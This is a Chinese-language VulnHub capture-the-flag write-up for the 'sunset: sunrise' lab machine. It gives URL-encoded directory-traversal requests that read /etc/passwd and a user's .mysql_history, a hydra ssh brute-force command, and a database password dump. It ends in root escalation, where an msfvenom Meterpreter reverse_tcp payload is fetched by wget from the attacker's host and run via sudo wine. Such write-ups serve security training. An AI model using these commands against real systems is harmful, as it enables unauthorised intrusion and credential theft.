[vulnhub]sunset: sunrise Writeup

个人博客地址

http://www.darkerbox.com

欢迎大家学习交流

靶机网址:

https://www.vulnhub.com/entry/sunset-sunrise,406/

靶机知识点:

靶机IP:192.168.2.129
kali IP:192.168.2.126

信息收集

nmap -sV -p- 192.168.2.129

在这里插入图片描述
扫目录发现啥也没有

访问8080端口,很明显的目录遍历漏洞。

在这里插入图片描述

漏洞利用

通过这个漏洞读取/etc/passwd文件。斜杠需要经过url编码。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

在这里插入图片描述

发现用户weborf
在这里插入图片描述
使用hydra 爆破

hydra -l weborf -P /usr/share/wordlists/rockyou.txt 192.168.2.129 ssh

等了几分钟,啥也没有。

还是继续去目录遍历吧。
去home下看看。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2f

在这里插入图片描述
有两个目录。先去第一个。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f

在这里插入图片描述
发现user.txt。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt在这里插入图片描述
第二个目录weborf

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

在这里插入图片描述
里面我看过了,没啥东西。

dirb扫描home/weborf下的文件。可能会有隐藏文件

dirb http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f

在这里插入图片描述

看到.mysql_history文件
访问它。

http://192.168.2.129:8080/..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history

在这里插入图片描述
看见数据库的账号和密码
尝试ssh登陆,登陆成功
在这里插入图片描述

权限提升

mysql -u weborf -p
use mysql
select user,password from user;

在这里插入图片描述

得到sunrise的密码thefutureissobrightigottawearshades

在这里插入图片描述

sudo -l

在这里插入图片描述
查看可以以root执行wine命令,wine可以执行exe程序。
先在kali中生成exe程序

msfvenom -p windows/meterpreter/reverse_tcp -f exe   --platform windows -a x86 LHOST=192.168.2.126 LPORT=6666 -o /root/Desktop/payload.exe
python3 -m http.server

在这里插入图片描述
在靶机中下载

cd /tmp
wget http://192.168.2.126:8000/payload.exe

在这里插入图片描述

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.126
set LPORT 6666
exploit

在这里插入图片描述

在靶机运行

sudo wine payload.exe

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

欢迎大家一起学习交流,共同进步,欢迎加入信息安全小白群

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Vicl1fe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值